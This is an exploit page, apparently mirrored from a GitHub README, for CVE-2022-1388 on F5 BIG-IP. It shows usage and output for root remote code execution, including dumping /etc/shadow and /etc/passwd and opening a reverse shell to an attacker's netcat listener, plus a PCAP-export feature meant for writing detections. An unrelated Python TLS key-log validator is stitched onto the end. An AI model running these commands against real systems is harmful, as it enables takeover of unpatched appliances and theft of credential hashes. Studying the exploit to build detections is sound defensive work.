## https://sploitus.com/exploit?id=E2690F56-34D9-5735-A733-8193CE2B6DBE
# CVE-2022-1388 RCE, Reverse Shell, and Auto-Export PCAP
### -- FOR EDUCATIONAL USE ONLY -- 

The author is not responsible or held liable for any actions taken with any aspect of this project/repository. I created this for the purposes of understanding the attack as well as writing detections within a SIEM and wanted to share for others to do the same. Use at your own risk.

This exploit targets the BIG-IP iControl REST vulnerability CVE-2022-1388 in F5 Systems. Please see the F5 advisory (https://support.f5.com/csp/article/K23605346) for affected versions and other information.

Feel free to PR or report any issues. This was tested on a few vulnerable F5 VEs in Google Cloud from a CentOS machine with Python 3.6.

## Usage
```
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]

optional arguments:
  -h, --help            show this help message and exit
  
  -t TARGET, --target TARGET, --RHOSTS TARGET
                        Target IP of vulnerable BIG-IP system
  -p PORT, --port PORT, --RPORT PORT
                        Target port on vulnerable BIG-IP system
  -c CMD, --cmd CMD, --command CMD
                        Command to run on target system
  -e, --export, --tcpdump
                        Export captured traffic and ssl-key.log | **Requires sudo privileges!
  -q, --quiet           Don't display banner
  -s, --shell           Launch an interactive shell
  -lh LHOST, --lhost LHOST, --LHOST LHOST
                        Required for -s [shell]; Local IP/interface to bind listener to
  -lp LPORT, --lport LPORT, --LPORT LPORT
                        Required for -s [shell]; Local port to bind listener to
```

## Remote Code Execution
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id

===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
        Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
```

## Reverse shell
```
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444

===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
        Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...

[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
 
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
```

## Exporting a PCAP for analysis
Specifying the -e (--export) flag creates two files, detection.pcap and ssl-key.log. Both files are overwritten every time -e is specified, so move or rename any you want to keep. To decrypt the TLS session, import ssl-key.log into Wireshark via Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename. Because the capture is taken with tcpdump, the script must be run with sudo whenever -e is used.
```
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
```

Before TLS Decryption:

<img width="784" alt="Wireshark 01" src="https://user-images.githubusercontent.com/58718722/209455397-a686fdc0-1b8e-408b-908b-0280166bf7d1.png">


Adding the automatically-exported ssl-key.log to the TLS preferences in Wireshark:

<img width="784" alt="Wireshark Preferences" src="https://user-images.githubusercontent.com/58718722/209455234-2cbfede9-0a89-4386-a362-7c1e37a67f29.png">


After TLS Decryption:

<img width="784" alt="Wireshark 02" src="https://user-images.githubusercontent.com/58718722/209455422-d22c87a9-be84-4262-a217-30621b67c89b.png">

<img width="728" alt="Wireshark 03" src="https://user-images.githubusercontent.com/58718722/209455326-751bc49a-a147-499d-b0c9-c6119668f5e9.png">
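The decryption step above only works if every line of ssl-key.log is in the shape Wireshark expects; records it cannot parse are dropped silently and the matching TLS stream simply stays encrypted. The following Python is an added example written for this page, not code from this repository: it validates a key log before import, reports which client randoms it can decrypt, and shows how the same file is produced from Python's own ssl module. The sample log, the `KeyLogEntry`/`parse_keylog`/`client_randoms`/`keylog_context` names and the accepted secret lengths are this example's own choices; `keylog_context` assumes Python 3.8+ built against OpenSSL 1.1.1+, which is newer than the Python 3.6 the README mentions.

```python
"""Validate an NSS-format TLS key log (such as ssl-key.log) before importing it into Wireshark."""
import re
import ssl
from dataclasses import dataclass

# Wireshark's "(Pre)-Master-Secret log filename" reads the NSS key log format:
# one "<LABEL> <client_random> <secret>" record per line, hex-encoded, "#" comments allowed.
KEYLOG_LINE = re.compile(
    r"^(?P<label>[A-Z_0-9]+)\s+(?P<client_random>[0-9a-fA-F]{64})\s+(?P<secret>[0-9a-fA-F]+)$"
)

# Labels Wireshark knows how to use. CLIENT_RANDOM carries a TLS 1.2 master secret;
# the *_TRAFFIC_SECRET* labels carry the per-direction secrets of a TLS 1.3 session.
KNOWN_LABELS = {
    "CLIENT_RANDOM",
    "CLIENT_EARLY_TRAFFIC_SECRET",
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET",
    "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0",
    "SERVER_TRAFFIC_SECRET_0",
    "EXPORTER_SECRET",
}
# Secret sizes this example accepts (an assumption, not a Wireshark rule): a 48-byte
# TLS 1.2 master secret, or a TLS 1.3 secret the size of the suite's hash
# (32 bytes for SHA-256, 48 for SHA-384). Hex encoding doubles the length.
VALID_SECRET_HEX_LENGTHS = {64, 96}


@dataclass(frozen=True)
class KeyLogEntry:
    label: str
    client_random: str  # Wireshark matches this against the ClientHello random in the pcap
    secret: str


def parse_keylog(text):
    """Return (entries, rejected). rejected holds (line_number, raw_line) pairs that
    Wireshark would ignore, so they are worth surfacing before analysis starts."""
    entries, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYLOG_LINE.match(line)
        if (m is None or m.group("label") not in KNOWN_LABELS
                or len(m.group("secret")) not in VALID_SECRET_HEX_LENGTHS):
            rejected.append((lineno, raw))
            continue
        entries.append(KeyLogEntry(m.group("label"),
                                   m.group("client_random").lower(),
                                   m.group("secret").lower()))
    return entries, rejected


def client_randoms(entries):
    """Set of client randoms the log can decrypt; a TLS stream whose ClientHello
    random is absent from this set stays encrypted in Wireshark."""
    return {e.client_random for e in entries}


def keylog_context(path):
    """SSLContext that appends every session's secrets to `path` in NSS format.
    Assumes Python 3.8+ on OpenSSL 1.1.1+; the file is opened as soon as it is assigned."""
    ctx = ssl.create_default_context()
    ctx.keylog_filename = path
    return ctx


# Constructed sample log for this example; not a real capture.
_RANDOM = "ab" * 32
SAMPLE_KEYLOG = "\n".join([
    "# constructed sample, not a real capture",
    f"CLIENT_RANDOM {_RANDOM} {'cd' * 48}",               # TLS 1.2 master secret, 48 bytes
    f"SERVER_TRAFFIC_SECRET_0 {'11' * 32} {'22' * 32}",   # TLS 1.3 secret, SHA-256 suite
    "CLIENT_RANDOM deadbeef tooshort",                    # malformed: Wireshark would ignore it
])

if __name__ == "__main__":
    good, bad = parse_keylog(SAMPLE_KEYLOG)
    print(f"{len(good)} usable record(s) covering {len(client_randoms(good))} client random(s)")
    for lineno, raw in bad:
        print(f"line {lineno} rejected: {raw!r}")
```

Run it as a script to see the constructed sample summarised, or point `parse_keylog` at the contents of an exported ssl-key.log; if `rejected` is non-empty, fix or regenerate the log before loading it into Wireshark, and compare `client_randoms` against the ClientHello randoms in detection.pcap to confirm the capture and the key log belong to the same sessions.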